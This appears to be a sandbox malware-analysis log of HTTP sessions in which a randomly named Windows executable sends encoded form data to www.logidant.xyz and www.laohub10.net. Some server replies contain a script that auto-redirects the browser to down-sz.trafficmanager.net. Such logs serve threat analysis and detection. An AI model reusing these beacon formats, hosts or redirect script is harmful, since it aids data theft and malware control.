Jan 11, 2025 01:41:07.700984001 CET	652	OUT	POST /iuvu/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 227 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.logidant.xyz Origin: http://www.logidant.xyz Referer: http://www.logidant.xyz/iuvu/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 4b 42 45 68 43 4a 3d 31 45 36 43 37 35 54 5a 70 4a 4e 45 53 62 43 78 4c 74 68 72 42 48 54 63 4e 57 46 41 65 32 76 66 47 2f 59 4c 7a 7a 36 37 4f 54 35 56 47 46 6f 58 30 53 72 68 41 5a 45 49 4b 4d 66 72 55 55 2b 39 52 67 54 66 61 6d 36 39 68 38 74 75 30 6f 68 34 76 62 79 4b 58 46 62 2f 33 31 53 55 77 59 48 41 6e 35 77 6a 62 36 34 41 42 4a 37 59 2b 2b 41 4d 53 54 35 59 6b 51 35 35 42 2b 47 7a 2f 45 79 33 32 69 75 52 62 33 62 54 42 48 5a 6c 57 4f 35 65 74 34 71 35 62 73 34 76 77 70 56 64 37 61 50 31 75 7a 2f 71 58 67 7a 75 63 43 63 4b 59 43 52 43 70 55 6c 72 75 32 54 4f 79 78 42 48 71 41 36 55 2b 6f 57 78 4c 51 51 4b 59 63 42 75 48 36 76 61 4a 67 72 41 6b 36 4b 61 50 59 46 55 Data Ascii: KBEhCJ=1E6C75TZpJNESbCxLthrBHTcNWFAe2vfG/YLzz67OT5VGFoX0SrhAZEIKMfrUU+9RgTfam69h8tu0oh4vbyKXFb/31SUwYHAn5wjb64ABJ7Y++AMST5YkQ55B+Gz/Ey32iuRb3bTBHZlWO5et4q5bs4vwpVd7aP1uz/qXgzucCcKYCRCpUlru2TOyxBHqA6U+oWxLQQKYcBuH6vaJgrAk6KaPYFU
Jan 11, 2025 01:41:08.353347063 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 00:41:08 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49996	45.141.156.114	80	3668	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:41:10.248625040 CET	1669	OUT	POST /iuvu/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 1243 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.logidant.xyz Origin: http://www.logidant.xyz Referer: http://www.logidant.xyz/iuvu/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 4b 42 45 68 43 4a 3d 31 45 36 43 37 35 54 5a 70 4a 4e 45 53 62 43 78 4c 74 68 72 42 48 54 63 4e 57 46 41 65 32 76 66 47 2f 59 4c 7a 7a 36 37 4f 53 42 56 47 32 77 58 30 7a 72 68 42 5a 45 49 55 63 66 71 55 55 2f 2f 52 67 4c 62 61 6d 6d 44 68 2b 6c 75 79 4b 70 34 6e 4b 79 4b 65 46 62 2f 6f 6c 53 52 2b 34 48 5a 6e 39 63 6e 62 36 6f 41 42 4a 37 59 2b 34 6b 4d 47 77 68 59 69 51 35 34 47 2b 48 79 37 45 79 66 32 69 32 42 62 78 48 44 42 58 35 6c 58 74 42 65 76 4c 53 35 48 38 35 4a 67 35 56 46 37 61 4b 79 75 7a 69 52 58 67 32 37 63 45 73 4b 59 44 30 42 35 46 42 7a 7a 48 4c 7a 78 6a 35 52 32 31 69 69 38 4a 71 32 4e 6a 38 75 51 59 5a 2b 48 63 50 34 50 78 69 38 6d 75 4f 7a 47 4e 6f 46 5a 69 32 46 55 30 45 36 30 43 6c 39 54 6c 54 4d 35 4b 2b 2b 56 50 78 65 61 6a 39 53 34 6b 54 4b 69 6e 6b 4b 6a 50 6e 6e 6f 4f 53 2f 6e 30 53 52 4b 37 62 61 30 43 62 69 58 41 64 34 62 34 76 71 31 47 4e 6a 74 49 32 77 5a 69 38 74 6c 39 50 2b 30 77 33 4f 76 70 4b 78 6d 63 69 6b 42 31 7a 76 32 2f 74 54 31 38 6e 66 41 61 4a 49 6b 4a 51 [TRUNCATED] Data Ascii: KBEhCJ=1E6C75TZpJNESbCxLthrBHTcNWFAe2vfG/YLzz67OSBVG2wX0zrhBZEIUcfqUU//RgLbammDh+luyKp4nKyKeFb/olSR+4HZn9cnb6oABJ7Y+4kMGwhYiQ54G+Hy7Eyf2i2BbxHDBX5lXtBevLS5H85Jg5VF7aKyuziRXg27cEsKYD0B5FBzzHLzxj5R21ii8Jq2Nj8uQYZ+HcP4Pxi8muOzGNoFZi2FU0E60Cl9TlTM5K++VPxeaj9S4kTKinkKjPnnoOS/n0SRK7ba0CbiXAd4b4vq1GNjtI2wZi8tl9P+0w3OvpKxmcikB1zv2/tT18nfAaJIkJQo0xywPUAF2J+bw3aSn8/suMT4v+H7JbiywjYUN8COYgT2FbUMC+/uCwYPynE7p34GXEa9Uuz0PPxr1uUAXoO6wCKN9D0s5FP6xYuBTEjZlbdnyEctfqEQz+8hoso2aE+hhG0/Cy2rdoEQ+nO9gSW5LHiPkDk07kyLh3pu188dc7EEulV8r5PbDu/XUVAWVXd02qoQktx0O3PY2QjSrK1a41XDvioddg+BpTkFjY+v+DzVJI50lB/dG7RBj1jFfCD1hpU8Bod7dv7TRvd6RJEDssDs3RXEixf9pTIMDKSx/ttdvtuktqdkyqr0qZzeIh50D+rI/W3QLpAzODKlXdZ/XaMTc+U0nAcvYOnznxJbmyk+6t0zZhbbW9Wl/8u6vSqEP3QxBkgt4jRrVAJyJdhCidSHxWqhTdhNKxtqt4vm/ghI5D5AZFnrzFKmNtsbQ4RCpVAO7jfOleXnNf9mIcYIIXCCFx4k8nHUfzSczYcurpieLNCvROd2mmLjoU8FfILO3pz4M1+zOZzcCY5M6bC8q0BsMsS2M+ZRqgX4EPJUkPhRDqL7xJ45hdLs28xhtC6mQmoESlMImPp5dPxj3bp+KnH+6S9X4Me+cHdF7mrXCMSD+mKiLrdy9yWLBHzrUa+msSvMhDe7owypIfkli1ruLC8GvPaeLWVFM [TRUNCATED]
Jan 11, 2025 01:41:10.924496889 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 00:41:10 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49997	45.141.156.114	80	3668	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:41:12.794153929 CET	377	OUT	GET /iuvu/?KBEhCJ=4GSi4NjhieA+eby0NKQzTEPCPA5td1TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5ynY1PA81WB0aqcrP8TCrRqA4T6i/Y0YCRnlTl6YfLJ6nzbiw==&Kdr=RN-HMNoXj6pXm HTTP/1.1 Accept: / Accept-Language: en-US Connection: close Host: www.logidant.xyz User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Jan 11, 2025 01:41:13.641216993 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 00:41:13 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49998	27.124.4.246	80	3668	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:41:19.241024017 CET	632	OUT	POST /36be/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 207 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.laohub10.net Origin: http://www.laohub10.net Referer: http://www.laohub10.net/36be/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 4b 42 45 68 43 4a 3d 2b 52 57 2f 42 36 57 30 66 4b 6d 61 64 49 78 36 6f 50 76 73 4d 2b 30 43 6c 59 47 50 47 50 54 78 32 4e 6d 46 75 69 6b 75 41 56 71 4b 63 2b 4a 33 31 7a 49 4c 77 35 31 64 6c 64 42 35 73 4d 36 31 47 50 32 4b 38 72 6f 73 38 45 2b 71 2f 69 79 4a 42 66 34 39 33 41 56 45 70 2f 6a 4c 59 53 79 33 36 4f 7a 30 69 61 62 50 4e 5a 46 36 58 2f 77 46 4d 61 53 6f 58 48 33 54 67 32 66 70 6f 78 71 65 71 53 59 47 35 32 4b 39 74 32 2b 78 43 63 48 68 76 67 2b 4c 4e 73 6d 75 46 47 71 43 49 69 6f 54 4f 32 67 62 6f 71 4a 33 35 38 65 70 2b 75 73 45 31 64 4b 48 4c 71 35 79 42 79 41 71 55 6d 30 7a 36 75 61 44 70 78 55 3d Data Ascii: KBEhCJ=+RW/B6W0fKmadIx6oPvsM+0ClYGPGPTx2NmFuikuAVqKc+J31zILw51dldB5sM61GP2K8ros8E+q/iyJBf493AVEp/jLYSy36Oz0iabPNZF6X/wFMaSoXH3Tg2fpoxqeqSYG52K9t2+xCcHhvg+LNsmuFGqCIioTO2gboqJ358ep+usE1dKHLq5yByAqUm0z6uaDpxU=
Jan 11, 2025 01:41:20.034018993 CET	533	IN	HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=utf-8 Accept-Ranges: bytes Cache-Control: max-age=86400 Age: 1 Connection: Close Content-Length: 358 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED] Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49999	27.124.4.246	80	3668	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:41:21.791549921 CET	652	OUT	POST /36be/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 227 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.laohub10.net Origin: http://www.laohub10.net Referer: http://www.laohub10.net/36be/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 4b 42 45 68 43 4a 3d 2b 52 57 2f 42 36 57 30 66 4b 6d 61 62 6f 68 36 6b 4a 6e 73 5a 4f 30 44 35 6f 47 50 4a 76 53 32 32 4e 36 46 75 6d 56 6c 42 6e 2b 4b 62 66 35 33 32 78 77 4c 39 5a 31 64 71 39 42 38 69 73 37 33 47 50 79 73 38 75 41 73 38 41 65 71 2f 6e 4f 4a 42 4f 34 2b 30 77 56 47 77 76 6a 4a 63 53 79 33 36 4f 7a 30 69 65 4c 70 4e 64 70 36 55 4f 41 46 4e 37 53 6e 5a 6e 33 55 33 47 66 70 6a 52 71 61 71 53 59 77 35 7a 53 62 74 77 36 78 43 65 66 68 76 31 65 4d 61 38 6d 30 4c 6d 72 67 43 48 59 57 4c 32 34 77 74 49 4d 75 70 39 71 53 2f 59 64 75 76 2f 43 76 59 4b 56 4b 52 68 49 64 46 57 56 61 67 4e 4b 7a 33 6d 41 78 50 42 36 37 69 68 65 45 46 7a 69 34 43 7a 76 48 57 47 33 6b Data Ascii: KBEhCJ=+RW/B6W0fKmaboh6kJnsZO0D5oGPJvS22N6FumVlBn+Kbf532xwL9Z1dq9B8is73GPys8uAs8Aeq/nOJBO4+0wVGwvjJcSy36Oz0ieLpNdp6UOAFN7SnZn3U3GfpjRqaqSYw5zSbtw6xCefhv1eMa8m0LmrgCHYWL24wtIMup9qS/Yduv/CvYKVKRhIdFWVagNKz3mAxPB67iheEFzi4CzvHWG3k
Jan 11, 2025 01:41:22.566281080 CET	533	IN	HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=utf-8 Accept-Ranges: bytes Cache-Control: max-age=86400 Age: 1 Connection: Close Content-Length: 358 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED] Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	50000	27.124.4.246	80	3668	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:41:24.346798897 CET	1669	OUT	POST /36be/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 1243 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.laohub10.net Origin: http://www.laohub10.net Referer: http://www.laohub10.net/36be/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 4b 42 45 68 43 4a 3d 2b 52 57 2f 42 36 57 30 66 4b 6d 61 62 6f 68 36 6b 4a 6e 73 5a 4f 30 44 35 6f 47 50 4a 76 53 32 32 4e 36 46 75 6d 56 6c 42 6e 47 4b 62 6f 52 33 31 57 63 4c 38 5a 31 64 6a 64 42 39 69 73 37 32 47 50 4b 6f 38 75 46 62 38 43 6d 71 2b 46 32 4a 51 4d 41 2b 76 67 56 47 74 2f 6a 55 59 53 79 59 36 4f 6a 34 69 61 58 70 4e 64 70 36 55 4e 6f 46 4e 71 53 6e 4a 58 33 54 67 32 66 74 6f 78 71 79 71 53 41 67 35 79 6e 6d 74 6a 79 78 44 2b 50 68 6a 68 2b 4d 46 4d 6d 71 47 47 72 47 43 48 64 47 4c 32 55 57 74 4a 34 45 70 36 47 53 2b 63 38 33 71 73 44 30 61 73 52 59 55 41 59 39 59 32 49 39 72 73 36 32 36 68 73 75 43 43 4b 30 30 42 6d 61 4a 79 62 73 5a 55 75 57 53 53 57 45 64 43 45 6f 2b 36 58 30 34 42 33 39 6e 75 4e 56 39 33 41 58 76 41 33 55 33 51 43 43 53 74 78 42 59 36 4b 54 56 4b 4d 35 38 31 7a 4c 68 73 38 46 34 42 30 77 73 53 69 66 4d 76 71 6b 68 43 61 67 75 4f 69 67 77 77 41 79 53 48 66 30 4b 35 4a 71 77 61 76 5a 70 59 68 4b 63 6d 79 54 7a 4b 54 57 78 33 4d 51 54 48 6e 4e 6a 49 32 54 42 67 2b [TRUNCATED] Data Ascii: KBEhCJ=+RW/B6W0fKmaboh6kJnsZO0D5oGPJvS22N6FumVlBnGKboR31WcL8Z1djdB9is72GPKo8uFb8Cmq+F2JQMA+vgVGt/jUYSyY6Oj4iaXpNdp6UNoFNqSnJX3Tg2ftoxqyqSAg5ynmtjyxD+Phjh+MFMmqGGrGCHdGL2UWtJ4Ep6GS+c83qsD0asRYUAY9Y2I9rs626hsuCCK00BmaJybsZUuWSSWEdCEo+6X04B39nuNV93AXvA3U3QCCStxBY6KTVKM581zLhs8F4B0wsSifMvqkhCaguOigwwAySHf0K5JqwavZpYhKcmyTzKTWx3MQTHnNjI2TBg+mk9lg3IAryk6EFMubuvJYay1Ag3fLMuABsYQ4hl8lNQGF7TvjZvkr96kvqSc/h5e1TrjZQwd4FcrA5KLCNsarfa5qmFLqaDhFaqyHc7epcyKR4MSZ688pWyaQN9rRFcaZ0L0/t+8NacAL7h7PIC6xVpW+1yUsgiCZffMqWzbOmPSxFJHVCUUkoXZ65ZSf7417l+2+ZOtCjgHuwjM5V4OGPU1s8dZVKGXf0n+ChT/3Y7jsks1TgHQNWguMCwUDWOi47rVVxJBjUpDPHn3XT586TaHZN4AfmR+uWQMTkk9kfpJjayOt4HjdfDGSFfZsBiGND93JFDBM91mv6IgeGV5lVjj/o8WmxTm5xe/48y8i68Kiw8Xpyad5PmDYiZERyMWytPvhMh+GKkIgQFyLYiPYeUW9RBnjjBWjfhgcX6mSwnSysVCsrkPhW/VHAeAgBlXrwBVQVmEukXjwtcW9bPXd1CowxnPz6bxzzgC7NqqlbZx5GKfi9VK09Gf9OwhUCARvLfgG8VBy3q3QDY+OPivVlu9p+6rfQh5/aRkT6Xl6WVYsa2dUuBACa6pOGVbpvVNSrTkhoVGHisd4Y2W8vvhNiLyGWramj6b5DthvXjGeJBE8SLJowiKFgiqI1Ws9xRkck81TcGY3cWpDtEkvwIHP7hMltBnCosFKw [TRUNCATED]
Jan 11, 2025 01:41:25.126048088 CET	533	IN	HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=utf-8 Accept-Ranges: bytes Cache-Control: max-age=86400 Age: 1 Connection: Close Content-Length: 358 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED] Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	50001	27.124.4.246	80	3668	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:41:26.898700953 CET	377	OUT	GET /36be/?KBEhCJ=zT+fCPSXWqCfWPgMnoOydtJKsJuCEtGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7tD9cl/byRSbJ8t/R3+K3cKRBXN0bJbe4ZjKihmDBlTXN1Q==&Kdr=RN-HMNoXj6pXm HTTP/1.1 Accept: / Accept-Language: en-US Connection: close Host: www.laohub10.net User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
